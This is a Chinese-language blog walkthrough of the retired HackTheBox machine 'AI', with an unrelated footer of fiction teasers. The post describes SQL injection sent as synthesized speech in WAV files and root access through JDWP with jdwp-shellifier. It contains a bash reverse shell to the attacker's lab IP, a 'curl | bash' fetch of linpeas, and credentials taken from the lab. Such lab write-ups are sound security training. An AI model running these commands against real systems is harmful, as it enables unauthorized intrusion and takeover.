hackthebox-AI——有趣的sql+JDWPgetshell

终于又等到hackthebox更新退役靶机了,这次的靶机是AI。因为比较有意思所以来记录下。不过过程并非一帆风顺。其中还遇到靶机磁盘写满导致无法写入文件的事。删了半天才想起来要重设靶机......

跟上次一样参考了下大神的视频https://www.youtube.com/watch?v=7n7YRntu3bc&t=1391s视频真的非常良心。

(这次做之前更新kali虚拟机,又把自己的虚拟机弄死机了......好在现在不那么容易整体炸掉,倒是kali的界面越更新越舒适,挺不错的)


AI

本机ip:10.10.15.60

靶机ip:10.10.10.163

首先第一步当然是探测端口了

nmap -sC -sV -oA ai 10.10.10.163
nmap

发现有22与80端口开放。既然有http服务,那就尝试直接访问吧。
有一个主页面。同时也发现了其他php文件,唯一比较有意思的就是下面这个ai.php页面,有一个文件上传点。

ai

但是很奇怪。居然是.wavfile。通常我所知道的文件上传点也就图片马或者phar反序列化或者其他类型的getshell。而它提示的drop your query using wav file.似乎是在说明我们可以进行查询操作。

那么首先随便传一个test.php上去。内容随意。发现没有回显。


test

看来是要wav的音频文件了。使用音频文件执行查询,这点真的难以弄懂。那么在尝试弄清漏洞类型之前先来目录爆破一下,看有没有什么别的信息:

gobuster dir -u http://10.10.10.163 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

基于这里都是php,我们在gobuster后着重加上-x php进行筛选。
解果大致如下:

/index.php (Status: 200)
/contact.php (Status: 200)
/about.php (Status: 200)
/images (Status: 301)
/uploads (Status: 301)
/db.php (Status:301)
/intelligence.php(Status: 200)
/ai.php(Status: 200)

其中ai.php等等都是主页面就提供了的。新发现的页面包括intelligence.phpdb.php。上传跟图片界面我们都没有权限进去。那么访问下唯一可以访问的intelligence.php

intelligence.php

发现了这个页面。似乎存在着词语的替换关系。从表的右列中我们不难找到一些熟悉的符号--union,#,---,Schema等等。这些都是常常出现在sql注入中的符号。结合我们还爆破出了db.php,可以猜想是否有sql注入的漏洞呢?

答案是正确的。而且脑洞大开的是:我们要用语言转成音频文件上传来进行注入。这也许就是这个AI靶机的名字所在吧。

首先google linux say command, 发现有这样的一个软件。叫做festival。

apt-get install festival

使用它其中一个叫text2wave的就能将语句转成语音文件。比如用下管道符,生成一个test.wav,内容为hello。

echo "Hello"| text2wave -o test.wav
test

尝试听下这个音频,发现是个男低音(也许是机器合成音?)然后再次尝试上传


hello

发现input有结果,那么就尝试下翻译成英文来sql注入吧。
(这点对非英语母语的国家的人应该非常不友好......毕竟有些偏门的括号之类的英文我也不太熟)

( openparenthesis 左括号
) closeparenthesis 右括号
- hyphen   连字符

基于一开始还探测到的intelligence.php中有些字符对应关系,不难想到我们需要使用那张表来绕过注入
比如我的尝试payload

' union select database()---

需要换作

open single quote, join select , database open parenthesis close parenthesis comment database

再重复上面生成test.wav的操作,就可以上传注入。


database

基于hackthebox易得user的尿性,可以猜出一张users表然后爆出username跟password

'union select username from user---
open single quote, join , select , username from users comment database
open single quote, join , select , password from users comment database
username

password

显然,我们的http页面并没有什么让我们登录进去的方法或页面。基于之前的端口探测发现有ssh开放,不妨尝试ssh登录


ssh login

成功登陆。并且user.txt就在当前目录下。

之后就是常规提权的过程了。

这里开始可能会想到之前没成功访问的db.php,在/var/www/html中爆出内容

mysql

可知username为dbuser,password为toor
进入mysql可用的就多了。(然而我进去的时候库被别人删了......)实际上可以爆出之前alexa所在user表的内容中

username:root
password:H,Sq9t6}a<)?q931

但是ssh登录并不成功。mysql这条路走不通。

众所周知,发现提权的漏洞点并不是一件容易的事,尤其是对我这样的小白而言。所以,我从dalao视频那发现了一个很厉害的脚本可以解决我自己的漏洞认知问题。
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
在靶机上使用其中的linpeas.sh,脚本就会自动分析可能提权的漏洞点。着实解决不少问题。不过通常结果又臭又长,可能需要耐心找一找。
具体方法也很简单,本机git clone好后,起一个python监听(默认8000端口)

python -m SimpleHTTPServer

在靶机上直接curl后执行就好了

curl 10.10.15.60:8000/linpeas.sh | bash

这里从linpeas.sh的结果中可以发现一个JDWP的点被标红了。
那么jdwp是什么呢?我们搜索一下

JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。说白了就是JVM或者类JVM的虚拟机都支持一种协议,通过该协议,Debugger 端可以和 target VM 通信,可以获取目标 VM的包括类、对象、线程等信息

而这是有漏洞利用的。比如知道创宇上的
https://www.seebug.org/vuldb/ssvid-89216

等等,都是jdwp的代码执行漏洞。那么我们接下来就用这个漏洞,尝试拿到root权限。
首先确定使用的工具
https://github.com/IOActive/jdwp-shellifier

jdwp-shellifier(上面几个漏洞报告都是用的这个工具)之后考虑我们要执行的命令,当然是拿到root shell比较好。所以先在alexa的靶机的tmp目录下放一个反弹shell的脚本test.sh内容如下:

#!/bin/bash
bash -c 'bash -i >& /dev/tcp/10.10.15.60/9002 0>&1'

然后给其执行的权限

chmod +x test.sh

调用时只需:

./test.sh

先本机监听下,没有问题,可以弹到alexa的shell。

接下来用到一个新学到的大招:端口转发。我们都知道,每次ssh登录这一靶机都要用户密码,十分麻烦。而且将要利用的jdwp是java的debug功能,据说操作时十分容易断开。那有没有什么方法可以本机处理这个jdwp呢?答案就是端口转发。原本自己以为十分复杂,但实际上并非如此。

首先在靶机上确认jdwp是运行在8000端口的。
那么我先进入tomcat的目录,按下~C将直接进入ssh,然后将其转到localhost来研究

-L 8000:localhost:8000
a13.PNG

这时我们在本机上使用

ss -lntp

查看主机监听的端口。就会发现8000端口处于监听状态了,user是ssh。我们也可以用同样的方法转发tomcat的8009和8080端口到本地,这样我们就能直接浏览器访问localhost:8080来分析tomcat(当然这里没有什么帮助)

当然,这里转发到本地本来只是方便调试,因为可以直接在本地手动利用jdwp的漏洞,找到一个breakpoint用debug功能来执行命令。但是这方面实在不熟(java白学了),所以还是直接利用上面的脚本舒服啊。
shellifier用法

python jdwp-shellifier.py -t 目标主机ip -p jdwp运行端口 --cmd "Your Command"

这里我们直接

python jdwp-shellifier.py -t 127.0.0.1 --break-on "java.lang.String.indexOf" --cmd "/tmp/test.sh"

因为转发了ip,端口所以使用的ip是本地。而break-on这点方便找出可以利用的断点。最后的cmd执行我们的反弹shell。
本机再度监听后执行这个脚本


root

成功反弹shell到本机。即可拿到root.txt

感觉提权这方面自己还是不太熟悉,可能因为大部分ctf比赛注重的也只是getshell层面上的吧,之后的操作还要多加了解知识学习啊。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 158,560评论 4 361
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,104评论 1 291
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 108,297评论 0 243
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,869评论 0 204
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,275评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,563评论 1 216
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,833评论 2 312
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,543评论 0 197
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,245评论 1 241
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,512评论 2 244
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,011评论 1 258
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,359评论 2 253
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,006评论 3 235
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,062评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,825评论 0 194
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,590评论 2 273
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,501评论 2 268

推荐阅读更多精彩内容